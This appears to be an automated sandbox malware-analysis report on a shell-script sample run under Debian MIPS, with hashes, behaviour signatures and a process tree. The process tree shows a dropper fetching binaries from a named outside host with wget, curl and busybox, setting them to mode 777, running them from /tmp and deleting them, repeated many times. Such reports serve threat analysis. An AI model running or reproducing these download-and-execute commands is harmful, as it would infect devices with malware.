Analysis
max time kernel
104s
max time network
133s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags
arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted
21/11/2024, 06:30
Static task
static1
Behavioral task
behavioral1
Sample
839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
-
Size
10KB
-
MD5
2928f83ecf5ea360d714ea8e5f96e2f1
-
SHA1
9ab766d81607421235434062676110c95e811b9a
-
SHA256
839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35
-
SHA512
d2264b6eb7a636120ed44c9c9c588fe733bceb6da5ccd46ceb4bd1aaadbe1195fcd917007a1cf3fbc1e686b9db293bc6263ac28e66375aece5f3606273a25fbf
-
SSDEEP
96:Yz39z39z3g3L3v3Yu9u9u3mhLTJThTEokbhj/n6yc0SqzBFNCFtmFNre+kpB7L29:YMEIxe+4QLKD5Sm9EIxe+o85+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl (the same entry is recorded for each of the 28 curl processes)
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh/tmp/839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh1⤵PID:719
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:727
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO./9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:753
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- System Network Configuration Discovery
PID:754
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- System Network Configuration Discovery
PID:757
-
-
/bin/chmodchmod 777 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J./yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵PID:760
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- System Network Configuration Discovery
PID:761
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- System Network Configuration Discovery
PID:764
-
-
/bin/chmodchmod 777 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV./CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵PID:770
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- System Network Configuration Discovery
PID:772
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- System Network Configuration Discovery
PID:789
-
-
/bin/chmodchmod 777 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF./uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵PID:804
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- System Network Configuration Discovery
PID:806
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- System Network Configuration Discovery
PID:822
-
-
/bin/chmodchmod 777 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8./IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵PID:826
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- System Network Configuration Discovery
PID:827
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- System Network Configuration Discovery
PID:833
-
-
/bin/chmodchmod 777 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ./jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:836
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:837
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- System Network Configuration Discovery
PID:840
-
-
/bin/chmodchmod 777 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l./qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:847
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB./CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:884
-
-
/bin/chmodchmod 777 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA./rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:891
-
-
/bin/chmodchmod 777 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt./yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI./Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG./e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:912
-
-
/bin/chmodchmod 777 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp./GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:919
-
-
/bin/chmodchmod 777 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M./V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- System Network Configuration Discovery
PID:926
-
-
/bin/chmodchmod 777 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA./rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ./jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:940
-
-
/bin/chmodchmod 777 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l./qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- System Network Configuration Discovery
PID:947
-
-
/bin/chmodchmod 777 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB./CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M./V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:961
-
-
/bin/chmodchmod 777 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt./yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:968
-
-
/bin/chmodchmod 777 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI./Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG./e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp./GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF./uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:996
-
-
/bin/chmodchmod 777 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO./9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J./yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- System Network Configuration Discovery
PID:1010
-
-
/bin/chmodchmod 777 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV./CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- System Network Configuration Discovery
PID:1014
-
-
